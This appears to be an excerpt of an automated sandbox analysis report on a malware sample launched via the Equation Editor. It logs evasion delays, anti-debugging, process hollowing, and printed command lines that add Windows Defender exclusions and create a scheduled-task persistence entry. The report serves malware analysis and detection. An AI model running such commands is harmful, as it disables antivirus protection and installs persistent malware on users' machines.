Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Memory allocated: 280000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Memory allocated: 2100000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Memory allocated: 3C0000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Memory allocated: 5F80000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Memory allocated: 6F80000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Memory allocated: 71F0000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Memory allocated: 81F0000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Memory allocated: 200000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Memory allocated: 23F0000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Memory allocated: 450000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Memory allocated: 250000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Memory allocated: 21C0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Memory allocated: 530000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Memory allocated: 5F90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Memory allocated: 6F90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Memory allocated: 7380000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Memory allocated: 8380000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Memory allocated: 200000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Memory allocated: 22F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Memory allocated: 450000 memory reserve | memory write watch

Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Thread delayed: delay time: 600000			Jump to behavior
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Thread delayed: delay time: 600000

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1497			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3203			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2444			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3048			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Window / User API: threadDelayed 1270			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Window / User API: threadDelayed 8516			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2631
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2087
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2582
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1909
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Window / User API: threadDelayed 9024
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Window / User API: threadDelayed 799

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3428	Thread sleep time: -360000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr TID: 3788	Thread sleep time: -60000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr TID: 3488	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3800	Thread sleep time: -120000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3828	Thread sleep time: -2767011611056431s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3816	Thread sleep time: -120000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3844	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3760	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr TID: 4028	Thread sleep time: -60000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr TID: 3360	Thread sleep time: -7378697629483816s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr TID: 3360	Thread sleep time: -3600000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr TID: 3368	Thread sleep count: 1270 > 30			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr TID: 3368	Thread sleep count: 8516 > 30			Jump to behavior
Source: C:\Windows\System32\taskeng.exe TID: 4008	Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe TID: 3316	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe TID: 4044	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3304	Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3364	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3296	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3348	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3148	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe TID: 3420	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe TID: 3412	Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe TID: 3412	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe TID: 3408	Thread sleep count: 9024 > 30
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe TID: 3408	Thread sleep count: 799 > 30

Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Thread delayed: delay time: 600000			Jump to behavior
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Thread delayed: delay time: 600000

Source: C:\Users\user\AppData\Roaming\swagodi78811.scr

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Roaming\swagodi78811.scr

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\swagodi78811.scr"
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe"
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe"
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe"
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\swagodi78811.scr"			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe"			Jump to behavior
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe"
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe"

Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Memory written: C:\Users\user\AppData\Roaming\swagodi78811.scr base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Memory written: C:\Users\user\AppData\Roaming\gRpkBp.exe base: 400000 value starts with: 4D5A

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\swagodi78811.scr "C:\Users\user\AppData\Roaming\swagodi78811.scr"			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\swagodi78811.scr"			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe"			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gRpkBp" /XML "C:\Users\user\AppData\Local\Temp\tmpD135.tmp"			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process created: C:\Users\user\AppData\Roaming\swagodi78811.scr "C:\Users\user\AppData\Roaming\swagodi78811.scr"			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Process created: C:\Users\user\AppData\Roaming\swagodi78811.scr "C:\Users\user\AppData\Roaming\swagodi78811.scr"			Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\AppData\Roaming\gRpkBp.exe C:\Users\user\AppData\Roaming\gRpkBp.exe
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe"
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gRpkBp.exe"
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gRpkBp" /XML "C:\Users\user\AppData\Local\Temp\tmpED3D.tmp"
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Process created: C:\Users\user\AppData\Roaming\gRpkBp.exe "C:\Users\user\AppData\Roaming\gRpkBp.exe"

Language, Device and Operating System Detection

Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Queries volume information: C:\Users\user\AppData\Roaming\swagodi78811.scr VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation			Jump to behavior
